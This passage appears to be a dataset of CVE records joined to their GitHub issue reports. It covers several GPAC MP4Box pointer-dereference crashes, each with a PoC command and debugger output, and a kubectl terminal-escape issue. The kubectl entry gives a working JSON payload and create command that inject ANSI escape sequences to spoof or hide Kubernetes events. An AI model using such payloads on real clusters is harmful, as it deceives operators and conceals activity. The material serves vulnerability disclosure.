0x53afb8 gf_isom_close+24 f 6 0x4115b2 mp4boxMain+7410 f 7 0xb57340 __libc_start_main+1168 pwndbg> bt #0 0x0000000000544b81 in shift_chunk_offsets.part () #1 0x0000000000544ea7 in inplace_shift_moov_meta_offsets () #2 0x000000000054593c in inplace_shift_mdat () #3 0x0000000000549b09 in WriteToFile () #4 0x000000000053af32 in gf_isom_write () #5 0x000000000053afb8 in gf_isom_close () #6 0x00000000004115b2 in mp4boxMain () #7 0x0000000000b57340 in __libc_start_main () #8 0x0000000000402cbe in _start () ```

Untrusted pointer dereference in shift_chunk_offsets.part ()

https://api.github.com/repos/gpac/gpac/issues/1999/comments

2021-12-22T12:55:57Z

2022-01-03T11:21:14Z

https://github.com/gpac/gpac/issues/1999

CVE-2021-46040

2022-01-06T20:15:08.723

A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1 via the finplace_shift_moov_meta_offsets function, which causes a Denial of Servie (context-dependent).

https://github.com/gpac/gpac/issues/2003

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC6 ``` [POC6.zip](https://github.com/gpac/gpac/files/7763917/POC6.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7910358 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x5569555e0d34 RBX 0x5555555e0000 ◂— 0x7374626c /* 'lbts' */ RCX 0x0 RDX 0x14 RDI 0x5555555db330 —▸ 0x5555555e0640 ◂— 0x5569555dfab4 RSI 0x1 R8 0x0 R9 0x7fffffff7f00 —▸ 0x7ffff76a15c0 (_IO_2_1_stderr_) ◂— 0xfbad2887 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff78fa0d0 (gf_isom_box_size) ◂— endbr64 R12 0x5555555da950 ◂— 0x0 R13 0x14 R14 0x2 R15 0x7fffffff7fd0 ◂— 0x0 RBP 0x1 RSP 0x7fffffff7fd0 ◂— 0x0 RIP 0x7ffff7910358 (inplace_shift_moov_meta_offsets+152) ◂— mov rdi, qword ptr [rax + 0x50] [ DISASM ] ► 0x7ffff7910358 <inplace_shift_moov_meta_offsets+152> mov rdi, qword ptr [rax + 0x50] 0x7ffff791035c <inplace_shift_moov_meta_offsets+156> mov rbx, rax 0x7ffff791035f <inplace_shift_moov_meta_offsets+159> test rdi, rdi 0x7ffff7910362 <inplace_shift_moov_meta_offsets+162> je inplace_shift_moov_meta_offsets+176 <inplace_shift_moov_meta_offsets+176> ↓ 0x7ffff7910370 <inplace_shift_moov_meta_offsets+176> mov rsi, qword ptr [rbx + 0x38] 0x7ffff7910374 <inplace_shift_moov_meta_offsets+180> movzx r8d, byte ptr [r12 + 0x37] 0x7ffff791037a <inplace_shift_moov_meta_offsets+186> mov rax, qword ptr [rsi + 0x40] 0x7ffff791037e <inplace_shift_moov_meta_offsets+190> mov rbx, qword ptr [rax + 0x30] 0x7ffff7910382 <inplace_shift_moov_meta_offsets+194> mov rdi, qword ptr [rbx + 0x58] 0x7ffff7910386 <inplace_shift_moov_meta_offsets+198> mov rdx, qword ptr [rbx + 0x60] 0x7ffff791038a <inplace_shift_moov_meta_offsets+202> test rdi, rdi [ STACK ] 00:0000│ r15 rsp 0x7fffffff7fd0 ◂— 0x0 01:0008│ 0x7fffffff7fd8 ◂— 0x3fa7125e0eb52b00 02:0010│ 0x7fffffff7fe0 ◂— 0x0 03:0018│ 0x7fffffff7fe8 —▸ 0x5555555da950 ◂— 0x0 04:0020│ 0x7fffffff7ff0 —▸ 0x5555555df7a0 —▸ 0x5555555e5720 ◂— 0xfbad2480 05:0028│ 0x7fffffff7ff8 ◂— 0x0 06:0030│ 0x7fffffff8000 —▸ 0x7fffffff84d8 ◂— 0x14 07:0038│ 0x7fffffff8008 —▸ 0x7fffffff84e0 ◂— 0x0 [ BACKTRACE ] ► f 0 0x7ffff7910358 inplace_shift_moov_meta_offsets+152 f 1 0x7ffff7910e3c inplace_shift_mdat+732 f 2 0x7ffff7915009 WriteToFile+2713 f 3 0x7ffff7906432 gf_isom_write+370 f 4 0x7ffff79064b8 gf_isom_close+24 f 5 0x55555557bd12 mp4boxMain+7410 f 6 0x7ffff74dc0b3 __libc_start_main+243 ───────────────────────────────────────────────────── ```

Untrusted pointer dereference in inplace_shift_moov_meta_offsets ()

https://api.github.com/repos/gpac/gpac/issues/2003/comments

2021-12-22T16:27:40Z

2022-01-03T11:23:50Z

https://github.com/gpac/gpac/issues/2003

CVE-2021-46041

2022-01-06T20:15:08.777

A Segmentation Fault Vulnerability exists in GPAC 1.0.1 via the co64_box_new function, which causes a Denial of Service.

https://github.com/gpac/gpac/issues/2004

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC7 ``` [POC7.zip](https://github.com/gpac/gpac/files/7764057/POC7.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. _int_malloc (av=av@entry=0x7ffff76a0b80 <main_arena>, bytes=bytes@entry=56) at malloc.c:3643 3643 malloc.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA [ REGISTERS ] RAX 0x7ffff76a0c20 (main_arena+160) —▸ 0x5555555e0ba0 ◂— 0x1400000014 RBX 0x7ffff76a0b80 (main_arena) ◂— 0x0 RCX 0x7ffff76a0c10 (main_arena+144) —▸ 0x7ffff76a0c00 (main_arena+128) —▸ 0x5555555e0b00 ◂— 0x1400000014 RDX 0x8013f76a0c24 RDI 0x7ffff76a0b80 (main_arena) ◂— 0x0 RSI 0x7ffff76a0b90 (main_arena+16) ◂— 0x0 R8 0x5555555e0ba0 ◂— 0x1400000014 R9 0x7fffffff7f00 ◂— 0x67 /* 'g' */ R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff78fa0d0 (gf_isom_box_size) ◂— endbr64 R12 0xffffffffffffffb0 R13 0x40 R14 0x4 R15 0x5555555e2a00 ◂— 0x1473746383 RBP 0x38 RSP 0x7fffffff7e40 ◂— 0x0 RIP 0x7ffff754fc5e (_int_malloc+110) ◂— cmp qword ptr [rdx + 0x10], r8 [ DISASM ] ► 0x7ffff754fc5e <_int_malloc+110> cmp qword ptr [rdx + 0x10], r8 0x7ffff754fc62 <_int_malloc+114> jne _int_malloc+2760 <_int_malloc+2760> ↓ 0x7ffff75506b8 <_int_malloc+2760> lea rdi, [rip + 0x121361] 0x7ffff75506bf <_int_malloc+2767> call malloc_printerr <malloc_printerr> 0x7ffff75506c4 <_int_malloc+2772> nop dword ptr [rax] 0x7ffff75506c8 <_int_malloc+2776> mov r9, qword ptr [rdx + 8] 0x7ffff75506cc <_int_malloc+2780> test r9b, 4 0x7ffff75506d0 <_int_malloc+2784> jne _int_malloc+3747 <_int_malloc+3747> 0x7ffff75506d6 <_int_malloc+2790> mov rax, qword ptr [rsp + 0x78] 0x7ffff75506db <_int_malloc+2795> jmp _int_malloc+2818 <_int_malloc+2818> 0x7ffff75506dd <_int_malloc+2797> nop dword ptr [rax] [ STACK ] 00:0000│ rsp 0x7fffffff7e40 ◂— 0x0 01:0008│ 0x7fffffff7e48 —▸ 0x7ffff78fabec (gf_isom_box_array_read_ex+860) ◂— mov r12d, eax 02:0010│ 0x7fffffff7e50 ◂— 0x0 03:0018│ 0x7fffffff7e58 —▸ 0x7ffff7e0cd89 ◂— 0x627473006c627473 /* 'stbl' */ 04:0020│ 0x7fffffff7e60 —▸ 0x5555555db530 ◂— 0x73747373 /* 'ssts' */ 05:0028│ 0x7fffffff7e68 ◂— 0x5101650c1f57a700 06:0030│ 0x7fffffff7e70 ◂— 0x8 07:0038│ 0x7fffffff7e78 —▸ 0x5555555e00d0 ◂— 0x7374626c /* 'lbts' */ [ BACKTRACE ] ► f 0 0x7ffff754fc5e _int_malloc+110 f 1 0x7ffff75522d4 malloc+116 f 2 0x7ffff78c17d2 co64_box_new+18 f 3 0x7ffff78f8aa9 gf_isom_box_new+153 f 4 0x7ffff791009c shift_chunk_offsets.part+284 f 5 0x7ffff79103a7 inplace_shift_moov_meta_offsets+231 f 6 0x7ffff7910e3c inplace_shift_mdat+732 f 7 0x7ffff7915009 WriteToFile+2713 pwndbg> bt #0 _int_malloc (av=av@entry=0x7ffff76a0b80 <main_arena>, bytes=bytes@entry=56) at malloc.c:3643 #1 0x00007ffff75522d4 in __GI___libc_malloc (bytes=56) at malloc.c:3058 #2 0x00007ffff78c17d2 in co64_box_new () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff78f8aa9 in gf_isom_box_new () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff791009c in shift_chunk_offsets.part () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff79103a7 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff7910e3c in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #7 0x00007ffff7915009 in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #8 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #9 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #10 0x000055555557bd12 in mp4boxMain () #11 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=3, argv=0x7fffffffe348, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe338) at ../csu/libc-start.c:308 #12 0x000055555556d45e in _start () pwndbg> ```

Segmentation fault in co64_box_new ()

https://api.github.com/repos/gpac/gpac/issues/2004/comments

2021-12-22T17:31:48Z

2022-01-03T11:24:08Z

https://github.com/gpac/gpac/issues/2004

CVE-2021-46042

2022-01-06T20:15:08.843

A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the _fseeko function, which causes a Denial of Service.

https://github.com/gpac/gpac/issues/2002

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC4 ``` [POC4.zip](https://github.com/gpac/gpac/files/7763835/POC4.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7544911 in __fseeko (fp=0x5555555e1510, offset=2560, whence=0) at fseeko.c:39 39 fseeko.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x5555555e1510 ◂— 0x8013fbad2494 RCX 0x0 RDX 0x0 RDI 0x5569555e1604 RSI 0xa00 R8 0x5555555e0f70 ◂— 0x1400000014 R9 0x7fffffff7f00 —▸ 0x7ffff76a15c0 (_IO_2_1_stderr_) ◂— 0xfbad2887 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff78fa0d0 (gf_isom_box_size) ◂— endbr64 R12 0x0 R13 0x7ffff697e740 ◂— 0x7ffff697e740 R14 0x7fffffff84e0 ◂— 0x0 R15 0x7fffffff8040 ◂— 0x15f RBP 0xa00 RSP 0x7fffffff7fd0 ◂— 0x0 RIP 0x7ffff7544911 (fseeko64+49) ◂— cmp qword ptr [rdi + 8], r13 [ DISASM ] ► 0x7ffff7544911 <fseeko64+49> cmp qword ptr [rdi + 8], r13 0x7ffff7544915 <fseeko64+53> je fseeko64+86 <fseeko64+86> ↓ 0x7ffff7544936 <fseeko64+86> add dword ptr [rdi + 4], 1 0x7ffff754493a <fseeko64+90> mov ecx, 3 0x7ffff754493f <fseeko64+95> mov edx, r12d 0x7ffff7544942 <fseeko64+98> mov rsi, rbp 0x7ffff7544945 <fseeko64+101> mov rdi, rbx 0x7ffff7544948 <fseeko64+104> call _IO_seekoff_unlocked <_IO_seekoff_unlocked> 0x7ffff754494d <fseeko64+109> xor r8d, r8d 0x7ffff7544950 <fseeko64+112> cmp rax, -1 0x7ffff7544954 <fseeko64+116> sete r8b [ STACK ] 00:0000│ rsp 0x7fffffff7fd0 ◂— 0x0 01:0008│ 0x7fffffff7fd8 —▸ 0x5555555df7a0 —▸ 0x5555555e1510 ◂— 0x8013fbad2494 02:0010│ 0x7fffffff7fe0 ◂— 0xa00 03:0018│ 0x7fffffff7fe8 ◂— 0x0 04:0020│ 0x7fffffff7ff0 —▸ 0x7fffffff84d8 ◂— 0x14 05:0028│ 0x7fffffff7ff8 —▸ 0x7ffff77767f4 (gf_bs_seek+452) ◂— mov qword ptr [rbx + 0x18], rbp 06:0030│ 0x7fffffff8000 —▸ 0x5555555da950 ◂— 0x0 07:0038│ 0x7fffffff8008 —▸ 0x5555555df7a0 —▸ 0x5555555e1510 ◂— 0x8013fbad2494 [ BACKTRACE ] ► f 0 0x7ffff7544911 fseeko64+49 f 1 0x7ffff77767f4 gf_bs_seek+452 f 2 0x7ffff7910c98 inplace_shift_mdat+312 f 3 0x7ffff7915009 WriteToFile+2713 f 4 0x7ffff7906432 gf_isom_write+370 f 5 0x7ffff79064b8 gf_isom_close+24 f 6 0x55555557bd12 mp4boxMain+7410 f 7 0x7ffff74dc0b3 __libc_start_main+243 ─────────────────────────────────────────────── ```

Untrusted pointer dereference in __fseeko()

https://api.github.com/repos/gpac/gpac/issues/2002/comments

2021-12-22T16:16:38Z

2022-01-03T11:23:34Z

https://github.com/gpac/gpac/issues/2002

CVE-2021-46043

2022-01-06T21:15:08.130

A Pointer Dereference Vulnerability exits in GPAC 1.0.1 in the gf_list_count function, which causes a Denial of Service.

https://github.com/gpac/gpac/issues/2001

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version ``` **command:** ``` ./bin/gcc/MP4Box -hint POC3 ``` [POC3.zip](https://github.com/gpac/gpac/files/7763770/POC3.zip) **Result** ``` segmentation fault ``` **bt** ```Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7773949 in gf_list_count () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x5555555e0010 ◂— 0x7374626c /* 'lbts' */ RBX 0x15 RCX 0x5555555e8230 ◂— 0x33483 RDX 0x2315 RDI 0x5569555e0124 RSI 0x15 R8 0x5555555e8230 ◂— 0x33483 R9 0x7fffffff7f00 ◂— 0x158 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e8380 ◂— 0x14 R12 0x5555555e29d0 ◂— 0x1473747378 R13 0x5555555e0530 ◂— 0x73747363 /* 'csts' */ R14 0x5555555e81f0 ◂— 0x636f3634 /* '46oc' */ R15 0x1 RBP 0x5555555dfc30 ◂— 0x6d646961 /* 'aidm' */ RSP 0x7fffffff7f28 —▸ 0x7ffff79286ed (Media_IsSelfContained+61) ◂— cmp ebx, eax RIP 0x7ffff7773949 (gf_list_count+9) ◂— mov eax, dword ptr [rdi + 8] ─[ DISASM ]─ ► 0x7ffff7773949 <gf_list_count+9> mov eax, dword ptr [rdi + 8] 0x7ffff777394c <gf_list_count+12> ret 0x7ffff777394d <gf_list_count+13> nop dword ptr [rax] 0x7ffff7773950 <gf_list_count+16> xor eax, eax 0x7ffff7773952 <gf_list_count+18> ret 0x7ffff7773953 nop word ptr cs:[rax + rax] 0x7ffff777395e nop 0x7ffff7773960 <gf_list_get> endbr64 0x7ffff7773964 <gf_list_get+4> test rdi, rdi 0x7ffff7773967 <gf_list_get+7> je gf_list_get+32 <gf_list_get+32> ↓ 0x7ffff7773980 <gf_list_get+32> xor eax, eax [ STACK ] 00:0000│ rsp 0x7fffffff7f28 —▸ 0x7ffff79286ed (Media_IsSelfContained+61) ◂— cmp ebx, eax 01:0008│ 0x7fffffff7f30 —▸ 0x5555555e2974 ◂— 0x140000232b /* '+#' */ 02:0010│ 0x7fffffff7f38 —▸ 0x5555555e81f0 ◂— 0x636f3634 /* '46oc' */ 03:0018│ 0x7fffffff7f40 ◂— 0x14 04:0020│ 0x7fffffff7f48 —▸ 0x7ffff790ffcb (shift_chunk_offsets.part+75) ◂— test eax, eax 05:0028│ 0x7fffffff7f50 —▸ 0x5555555dfc30 ◂— 0x6d646961 /* 'aidm' */ 06:0030│ 0x7fffffff7f58 —▸ 0x5555555e0530 ◂— 0x73747363 /* 'csts' */ 07:0038│ 0x7fffffff7f60 ◂— 0x0 ──────[ BACKTRACE ]──── ► f 0 0x7ffff7773949 gf_list_count+9 f 1 0x7ffff79286ed Media_IsSelfContained+61 f 2 0x7ffff790ffcb shift_chunk_offsets.part+75 f 3 0x7ffff79103a7 inplace_shift_moov_meta_offsets+231 f 4 0x7ffff7910e3c inplace_shift_mdat+732 f 5 0x7ffff7915009 WriteToFile+2713 f 6 0x7ffff7906432 gf_isom_write+370 f 7 0x7ffff79064b8 gf_isom_close+24 ```

Untrusted Pointer Dereference in gf_list_count ()

https://api.github.com/repos/gpac/gpac/issues/2001/comments

2021-12-22T16:04:39Z

2022-01-03T11:23:21Z

https://github.com/gpac/gpac/issues/2001

CVE-2021-46044

2022-01-06T21:15:08.177

A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1via ShiftMetaOffset.isra, which causes a Denial of Service (context-dependent).

https://github.com/gpac/gpac/issues/2006

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC9 ``` [POC9.zip](https://github.com/gpac/gpac/files/7764491/POC9.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x5555555e4cc0 --> 0x147472617f RBX: 0x5555555e4cc0 --> 0x147472617f RCX: 0x0 RDX: 0x17 RSI: 0x14 RDI: 0x1400000054 RBP: 0x3 RSP: 0x7fffffff7f78 --> 0x7ffff7910370 (<inplace_shift_moov_meta_offsets+176>: mov rsi,QWORD PTR [rbx+0x38]) RIP: 0x7ffff790fe70 (<ShiftMetaOffset.isra.0>: mov rax,QWORD PTR [rdi]) R8 : 0x0 R9 : 0x7fffffff7f00 --> 0x5555555e4c34 --> 0xe8 R10: 0x7ffff76d927a ("gf_isom_box_size") R11: 0x7ffff78fa0d0 (<gf_isom_box_size>: endbr64) R12: 0x5555555da950 --> 0xffffffec R13: 0x14 R14: 0x7 R15: 0x7fffffff7f80 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff790fe60 <gf_isom_get_content_light_level_info+128>: ret 0x7ffff790fe61: nop WORD PTR cs:[rax+rax*1+0x0] 0x7ffff790fe6b: nop DWORD PTR [rax+rax*1+0x0] => 0x7ffff790fe70 <ShiftMetaOffset.isra.0>: mov rax,QWORD PTR [rdi] 0x7ffff790fe73 <ShiftMetaOffset.isra.0+3>: test rax,rax 0x7ffff790fe76 <ShiftMetaOffset.isra.0+6>: je 0x7ffff790ff60 <ShiftMetaOffset.isra.0+240> 0x7ffff790fe7c <ShiftMetaOffset.isra.0+12>: push r15 0x7ffff790fe7e <ShiftMetaOffset.isra.0+14>: push r14 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff7f78 --> 0x7ffff7910370 (<inplace_shift_moov_meta_offsets+176>: mov rsi,QWORD PTR [rbx+0x38]) 0008| 0x7fffffff7f80 --> 0x0 0016| 0x7fffffff7f88 --> 0x82af77da4fe8b600 0024| 0x7fffffff7f90 --> 0x0 0032| 0x7fffffff7f98 --> 0x5555555da950 --> 0xffffffec 0040| 0x7fffffff7fa0 --> 0x5555555df7a0 --> 0x5555555f02f0 --> 0xfbad2480 0048| 0x7fffffff7fa8 --> 0x0 0056| 0x7fffffff7fb0 --> 0x7fffffff8488 --> 0x14 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff790fe70 in ShiftMetaOffset.isra.0 () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff790fe70 in ShiftMetaOffset.isra.0 () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff7910370 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff7910e3c in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff7915009 in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x000055555557bd12 in mp4boxMain () #7 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #8 0x000055555556d45e in _start () ```

Untrusted pointer dereference in ShiftMetaOffset.isra.0 ()

https://api.github.com/repos/gpac/gpac/issues/2006/comments

2021-12-22T18:20:11Z

2022-01-03T11:24:37Z

https://github.com/gpac/gpac/issues/2006

CVE-2021-25743

2022-01-07T00:15:07.817

kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events.

https://github.com/kubernetes/kubernetes/issues/101695

github.com

It is a security issue, but after contacting [email protected], Tim and the team confirmed that they are comfortable posting it publicly. #### What happened: Kubernetes doesn't sanitize the 'message' field in the Event JSON objects. Notice that this is relevant only to JSON objects, not YAML objects. By creating new event, we can insert ANSI escape characters inside the "message" field, like: ``` "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done" ``` This an example of such JSON request: ``` { "apiVersion": "v1", "involvedObject": { "kind": "Node", "name": "node01", "uid": "node01" }, "kind": "Event", "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done", "metadata": { "name": "spoofEvent", "namespace": "default" }, "source": { "component": "kubelet", "host": "node01" }, "type": "Normal" } ``` The codes: `\u001b[2J` -> Clean the screen and history `\u001b[3J` -> Clean the entire screen and delete all lines saved in the scrollback buffer `\u001b[1;1H` -> Moves the cursor position to row 1, column 1 (beginning). `\u001b[m` -> Set the colors `\u001b[60C` -> Move the cursor forward 60 steps `\u001b[1;1m` -> Set the text colors to white The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events. #### What you expected to happen: The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal). Or maybe some message that says that you can't use ANSI escape characters. #### How to reproduce it (as minimally and precisely as possible): 1. Run this code: ``` kubectl create -f - <<EOF { "apiVersion": "v1", "involvedObject": { "kind": "Node", "name": "node01", "uid": "node01" }, "kind": "Event", "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done", "metadata": { "name": "spoofEvent", "namespace": "default" }, "source": { "component": "kubelet", "host": "node01" }, "type": "Normal" } EOF ``` It will create a new event. 2. Run `kubectl get events`, you will see that the screen was clear, you will get a "spoof" message, and all the rest events or columns were gone. #### Anything else we need to know?: It might look like a low severity issue, but there are other variety of things we can do, from DoS by using colors to hide all the events, changing the title of the terminal window, and spoof the data. It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism. ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVE-2003-0069). #### Environment: - Kubernetes version (use `kubectl version`): ``` Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.4", GitCommit:"e87da0bd6e03ec3fea7933c4b5263d151aafd07c", GitTreeState:"clean", BuildDate:"2021-02-18T16:12:00Z", GoVersion:"go1.15.8", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.2", 